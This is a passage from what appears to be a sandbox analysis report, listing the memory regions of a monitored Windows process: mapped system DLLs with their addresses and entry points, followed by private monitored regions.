0x7feface6fff monitored = 0 entry_point = 0x7fefacc98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 864 start_va = 0x7fefacf0000 end_va = 0x7fefad56fff monitored = 0 entry_point = 0x7fefad06060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 865 start_va = 0x7fefad70000 end_va = 0x7fefad7afff monitored = 0 entry_point = 0x7fefad74f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 866 start_va = 0x7fefad80000 end_va = 0x7fefad8bfff monitored = 0 entry_point = 0x7fefad815d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 867 start_va = 0x7fefad90000 end_va = 0x7fefad9ffff monitored = 0 entry_point = 0x7fefad9835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 868 start_va = 0x7fefada0000 end_va = 0x7fefadb8fff monitored = 0 entry_point = 0x7fefada11a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 869 start_va = 0x7fefadc0000 end_va = 0x7fefadf6fff monitored = 0 entry_point = 0x7fefadc8424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 870 start_va = 0x7fefae40000 end_va = 0x7fefae54fff monitored = 0 entry_point = 0x7fefae460d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 871 start_va = 0x7fefae60000 end_va = 0x7fefaf21fff monitored = 0 entry_point = 0x7fefae6101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 872 start_va = 0x7fefb160000 end_va = 0x7fefb168fff monitored = 0 entry_point = 0x7fefb161010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 873 start_va = 0x7fefb250000 end_va = 0x7fefb27cfff monitored = 0 entry_point = 0x7fefb251010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 874 start_va = 0x7fefb280000 end_va = 0x7fefb290fff monitored = 0 entry_point = 0x7fefb2814c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 875 start_va = 0x7fefb2e0000 end_va = 0x7fefb350fff monitored = 0 entry_point = 0x7fefb31ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 876 start_va = 0x7fefb3d0000 end_va = 0x7fefb3e3fff monitored = 0 entry_point = 0x7fefb3d16b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 877 start_va = 0x7fefb3f0000 end_va = 0x7fefb404fff monitored = 0 entry_point = 0x7fefb3f1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 878 start_va = 0x7fefb410000 end_va = 0x7fefb41bfff monitored = 0 entry_point = 0x7fefb4118a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 879 start_va = 0x7fefb420000 end_va = 0x7fefb435fff monitored = 0 entry_point = 0x7fefb4211a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 880 start_va = 0x7fefb550000 end_va = 0x7fefb560fff monitored = 0 entry_point = 0x7fefb551070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 881 start_va = 0x7fefb6b0000 end_va = 0x7fefb6e4fff monitored = 0 entry_point = 0x7fefb6b1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 882 start_va = 0x7fefbb20000 end_va = 0x7fefbb75fff monitored = 0 entry_point = 0x7fefbb2bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 883 start_va = 0x7fefbb80000 end_va = 0x7fefbcabfff monitored = 0 entry_point = 0x7fefbb894bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 884 start_va = 0x7fefbcb0000 end_va = 0x7fefbcccfff monitored = 0 entry_point = 0x7fefbcb1ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 885 start_va = 0x7fefbd00000 end_va = 0x7fefbef3fff monitored = 0 entry_point = 0x7fefbe8c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 886 start_va = 0x7fefc390000 end_va = 0x7fefc39bfff monitored = 0 entry_point = 0x7fefc391064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 887 start_va = 0x7fefc3a0000 end_va = 0x7fefc45afff monitored = 0 entry_point = 0x7fefc3a6de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 888 start_va = 0x7fefc460000 end_va = 0x7fefc466fff monitored = 0 entry_point = 0x7fefc4614b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 889 start_va = 0x7fefc550000 end_va = 0x7fefc56afff monitored = 0 entry_point = 0x7fefc552068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 890 start_va = 0x7fefc570000 end_va = 0x7fefc58dfff monitored = 0 entry_point = 0x7fefc5713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 891 start_va = 0x7fefc590000 end_va = 0x7fefc5a1fff monitored = 0 entry_point = 0x7fefc591060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 892 start_va = 0x7fefc5b0000 end_va = 0x7fefc5cefff monitored = 0 entry_point = 0x7fefc5b5c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 893 start_va = 0x7fefc680000 end_va = 0x7fefc6b8fff monitored = 0 entry_point = 0x7fefc68c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 894 start_va = 0x7fefc6c0000 end_va = 0x7fefc6c9fff monitored = 0 entry_point = 0x7fefc6c3cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 895 start_va = 0x7fefc6d0000 end_va = 0x7fefc6dcfff monitored = 0 entry_point = 0x7fefc6d1348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 896 start_va = 0x7fefc7c0000 end_va = 0x7fefc806fff monitored = 0 entry_point = 0x7fefc7c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 897 start_va = 0x7fefc8b0000 end_va = 0x7fefc8dffff monitored = 0 entry_point = 0x7fefc8b194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 898 start_va = 0x7fefc8e0000 end_va = 0x7fefc93afff monitored = 0 entry_point = 0x7fefc8e6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 899 start_va = 0x7fefca50000 end_va = 0x7fefca56fff monitored = 0 entry_point = 0x7fefca5142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 900 start_va = 0x7fefca60000 end_va = 0x7fefcab4fff monitored = 0 entry_point = 0x7fefca61054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 901 start_va = 0x7fefcac0000 end_va = 0x7fefcad7fff monitored = 0 entry_point = 0x7fefcac3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 902 start_va = 0x7fefcbd0000 end_va = 0x7fefcc01fff monitored = 0 entry_point = 0x7fefcbd144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 903 start_va = 0x7fefcc10000 end_va = 0x7fefcc17fff monitored = 0 entry_point = 0x7fefcc12a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 904 start_va = 0x7fefcc20000 end_va = 0x7fefcc29fff monitored = 0 entry_point = 0x7fefcc23b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 905 start_va = 0x7fefcc30000 end_va = 0x7fefcc51fff monitored = 0 entry_point = 0x7fefcc35d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 906 start_va = 0x7fefccb0000 end_va = 0x7fefccdefff monitored = 0 entry_point = 0x7fefccb1064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 907 start_va = 0x7fefccf0000 end_va = 0x7fefcd5cfff monitored = 0 entry_point = 0x7fefccf1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 908 start_va = 0x7fefcd60000 end_va = 0x7fefcd73fff monitored = 0 entry_point = 0x7fefcd64160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 909 start_va = 0x7fefcfc0000 end_va = 0x7fefcfe2fff monitored = 0 entry_point = 0x7fefcfc1198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 910 start_va = 0x7fefd060000 end_va = 0x7fefd06afff monitored = 0 entry_point = 0x7fefd061030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 911 start_va = 0x7fefd090000 end_va = 0x7fefd0b4fff monitored = 0 entry_point = 0x7fefd099658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 912 start_va = 0x7fefd0c0000 end_va = 0x7fefd0cefff monitored = 0 entry_point = 0x7fefd0c1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 913 start_va = 0x7fefd0d0000 end_va = 0x7fefd160fff monitored = 0 entry_point = 0x7fefd0d1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 914 start_va = 0x7fefd170000 end_va = 0x7fefd1acfff monitored = 0 entry_point = 0x7fefd1718f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 915 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c3fff monitored = 0 entry_point = 0x7fefd1b10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 916 start_va = 0x7fefd1d0000 end_va = 0x7fefd1defff monitored = 0 entry_point = 0x7fefd1d19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 917 start_va = 0x7fefd270000 end_va = 0x7fefd27efff monitored = 0 entry_point = 0x7fefd271020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 918 start_va = 0x7fefd280000 end_va = 0x7fefd2bafff monitored = 0 entry_point = 0x7fefd281324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 919 start_va = 0x7fefd2c0000 end_va = 0x7fefd42cfff monitored = 0 entry_point = 0x7fefd2c10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 920 start_va = 0x7fefd4d0000 end_va = 0x7fefd53bfff monitored = 0 entry_point = 0x7fefd4d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 921 start_va = 0x7fefd540000 end_va = 0x7fefd575fff monitored = 0 entry_point = 0x7fefd541474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 922 start_va = 0x7fefd580000 end_va = 0x7fefd599fff monitored = 0 entry_point = 0x7fefd581558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 923 start_va = 0x7fefd5a0000 end_va = 0x7fefd6ccfff monitored = 0 entry_point = 0x7fefd5eed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 924 start_va = 0x7fefd6d0000 end_va = 0x7fefd721fff monitored = 0 entry_point = 0x7fefd6d10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 925 start_va = 0x7fefd730000 end_va = 0x7fefd932fff monitored = 0 entry_point = 0x7fefd753330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 926 start_va = 0x7fefd940000 end_va = 0x7fefd94dfff monitored = 0 entry_point = 0x7fefd941080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 927 start_va = 0x7fefdd50000 end_va = 0x7fefde18fff monitored = 0 entry_point = 0x7fefddca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 928 start_va = 0x7fefde20000 end_va = 0x7fefeba7fff monitored = 0 entry_point = 0x7fefde9cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 929 start_va = 0x7fefebb0000 end_va = 0x7fefec4efff monitored = 0 entry_point = 0x7fefebb25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 930 start_va = 0x7fefec50000 end_va = 0x7fefec7dfff monitored = 0 entry_point = 0x7fefec51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 931 start_va = 0x7fefec80000 end_va = 0x7fefecf0fff monitored = 0 entry_point = 0x7fefec91e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 932 start_va = 0x7fefed00000 end_va = 0x7fefed66fff monitored = 0 entry_point = 0x7fefed0b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 933 start_va = 0x7fefed70000 end_va = 0x7fefed77fff monitored = 0 entry_point = 0x7fefed71504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 934 start_va = 0x7fefed80000 end_va = 0x7fefee88fff monitored = 0 entry_point = 0x7fefed81064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 935 start_va = 0x7feff060000 end_va = 0x7feff13afff monitored = 0 entry_point = 0x7feff080760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 936 start_va = 0x7feff140000 end_va = 0x7feff1d8fff monitored = 0 entry_point = 0x7feff141c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 937 start_va = 0x7feff1e0000 end_va = 0x7feff1fefff monitored = 0 entry_point = 0x7feff1e60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 938 start_va = 0x7feff280000 end_va = 0x7feff2ccfff monitored = 0 entry_point = 0x7feff281070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 939 start_va = 0x7feff2d0000 end_va = 0x7feff3a6fff monitored = 0 entry_point = 0x7feff2d3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 940 start_va = 0x7feff3b0000 end_va = 0x7feff586fff monitored = 0 entry_point = 0x7feff3b1010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 941 start_va = 0x7feff5a0000 end_va = 0x7feff5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 942 start_va = 0x7fffff48000 end_va = 0x7fffff49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff48000" filename = "" Region: id = 943 start_va = 0x7fffff4a000 end_va = 0x7fffff4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4a000" filename = "" Region: id = 944 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 945 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 946 start_va = 0x7fffff50000 end_va = 0x7fffff51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 947 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 948 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 949 start_va = 0x7fffff56000 end_va = 0x7fffff57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 950 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 951 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 952 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 953 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 954 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 955 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 956 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 957 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 958 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 959 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 960 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 961 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 962 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 963 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 964 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 965 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 966 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 967 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 968 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 969 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 970 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 971 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 972 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 973 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 974 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 975 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 976 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 977 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 978 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 979 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 980 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 981 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 982 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 983 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 984 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 985 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 986 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 987 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 988 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 989 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 990 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 991 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 992 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 993 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 994 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 995 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 996 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 997 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 998 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 999 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1268 start_va = 0x7fef2fd0000 end_va = 0x7fef31a3fff monitored = 0 